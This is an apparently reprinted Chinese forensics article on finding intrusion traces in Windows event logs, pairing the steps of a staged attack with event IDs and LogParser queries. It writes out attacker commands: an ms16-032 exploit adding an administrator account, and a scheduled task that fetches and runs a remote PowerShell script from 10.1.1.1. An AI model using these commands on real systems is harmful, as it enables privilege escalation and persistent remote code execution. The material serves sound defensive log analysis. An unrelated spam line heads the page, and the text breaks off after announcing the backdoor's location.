自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

在Windows日志里發(fā)現(xiàn)入侵痕跡

作者:Bypass
系統(tǒng) Windows
有小伙伴問:Windows系統(tǒng)日志分析大多都只是對惡意登錄事件進行分析的案例,可以通過系統(tǒng)日志找到其他入侵痕跡嗎?

 [[358556]]

本文轉(zhuǎn)載自微信公眾號「Bypass」,作者Bypass。轉(zhuǎn)載本文請聯(lián)系Bypass公眾號。

有小伙伴問:Windows系統(tǒng)日志分析大多都只是對惡意登錄事件進行分析的案例,可以通過系統(tǒng)日志找到其他入侵痕跡嗎?

答案肯定是可以的,當攻擊者獲取webshell后,會通過各種方式來執(zhí)行系統(tǒng)命令。所有的web攻擊行為會存留在web訪問日志里,而執(zhí)行操作系統(tǒng)命令的行為也會存在在系統(tǒng)日志。

不同的攻擊場景會留下不一樣的系統(tǒng)日志痕跡,不同的Event ID代表了不同的意義,需要重點關(guān)注一些事件ID,來分析攻擊者在系統(tǒng)中留下的攻擊痕跡。

我們通過一個攻擊案例來進行windows日志分析,從日志里識別出攻擊場景,發(fā)現(xiàn)惡意程序執(zhí)行痕跡,甚至還原攻擊者的行為軌跡。

1、信息收集

攻擊者在獲取webshell權(quán)限后,會嘗試查詢當前用戶權(quán)限,收集系統(tǒng)版本和補丁信息,用來輔助權(quán)限提升。

  1. whoami 
  2. systeminfo 

Windows日志分析:

在本地安全策略中,需開啟審核進程跟蹤,可以跟蹤進程創(chuàng)建/終止。關(guān)鍵進程跟蹤事件和說明,如:

  1. 4688 創(chuàng)建新進程 
  2. 4689 進程終止 

我們通過LogParser做一個簡單的篩選,得到Event ID 4688,也就是創(chuàng)建新進程的列表,可以發(fā)現(xiàn)用戶Bypass,先后調(diào)用cmd執(zhí)行whami和systeminfo。Conhost.exe進程主要是為命令行程序(cmd.exe)提供圖形子系統(tǒng)等功能支持。

  1. LogParser.exe  -i:EVT "SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,'|')  as UserName,EXTRACT_TOKEN(Strings,5,'|')  as ProcessName FROM c:\11.evtx where EventID=4688" 

2、權(quán)限提升

通過執(zhí)行exp來提升權(quán)限,獲取操作系統(tǒng)system權(quán)限,增加管理用戶。

  1. ms16-032.exe "whoami" 
  2. ms16-032.exe "net user test1 abc123! /add" 
  3. ms16-032.exe "net localgroup Administrators test1 /add" 

Windows日志分析:

在本地安全策略中,需開啟審核賬戶管理,關(guān)鍵賬戶管理事件和說明。如:

  1. 4720 創(chuàng)建用戶 
  2.  
  3. 4732 已將成員添加到啟用安全性的本地組 

這里會涉及進程創(chuàng)建,主要關(guān)注賬戶創(chuàng)建和管理用戶組變更。從Event ID 4720 ,系統(tǒng)新建了一個test用戶,從Event ID 4732的兩條記錄變化,得到一個關(guān)鍵信息,本地用戶test從user組提升到Administrators。

3、管理賬號登錄

在創(chuàng)建管理賬戶后,嘗試遠程登錄到目標主機,獲取敏感信息。

  1. mstsc /v 10.1.1.188 

Windows日志分析:

在本地安全策略中,需開啟審核登錄事件,關(guān)鍵登錄事件和說明,如:

  1. 4624 登錄成功 
  2. 4625 登錄失敗 

  1. LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,'|') as EventType,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings,18,'|') as Loginip FROM C:\3333.evtx where EventID=4624" 

使用LogParser做一下分析,得到系統(tǒng)登錄時間,登錄類型10 也就是遠程登錄,登錄用戶 test,登錄IP:10.1.1.1。

4、權(quán)限維持

通過創(chuàng)建計劃任務(wù)執(zhí)行腳本后門,以便下次直接進入,使用以下命令可以一鍵實現(xiàn):

  1. schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.1.1.1:8888/logo.txt\"\"\"))\"" 

Windows日志分析:

在本地安全策略中,需開啟審核對象訪問,關(guān)鍵對象訪問事件,如:

  1. 4698 創(chuàng)建計劃任務(wù) 
  2.  
  3. 4699 刪除計劃任務(wù) 

這里涉及進程創(chuàng)建和對象訪問事件,包括schtasks.exe進程的創(chuàng)建和Event ID 4698發(fā)現(xiàn)新建的計劃任務(wù)。成功找到計劃任務(wù)后門位置:

 

責任編輯:武曉燕 來源: Bypass
Windows日志入侵
相關(guān)推薦

2011-03-07 17:52:51

2017-03-29 14:42:23

Windows 7Windows上網(wǎng)痕跡

2011-11-21 17:20:02

DCOM錯誤日志

2010-03-26 16:16:55

Windows 7

2013-08-29 10:26:27

windows系統(tǒng)防火防火墻

2011-11-21 16:35:46

2012-05-14 13:16:24

WindowsARM

2021-04-19 08:02:54

Windows手工入侵

2011-04-27 09:55:07

2011-03-15 14:31:32

2010-05-07 11:22:18

Unix操作系統(tǒng)

2011-03-15 15:41:43

2009-07-16 08:55:08

Windows 7IIS日志記錄

2009-10-15 09:55:48

2022-04-06 10:34:09

Linux元數(shù)據(jù)

2022-06-13 08:41:35

補丁漏洞

2009-12-16 15:43:44

2010-09-17 17:10:43

Windows后門

2010-08-25 14:10:34

2020-08-18 16:21:36

安全黑客攝像機
點贊
收藏

51CTO技術(shù)棧公眾號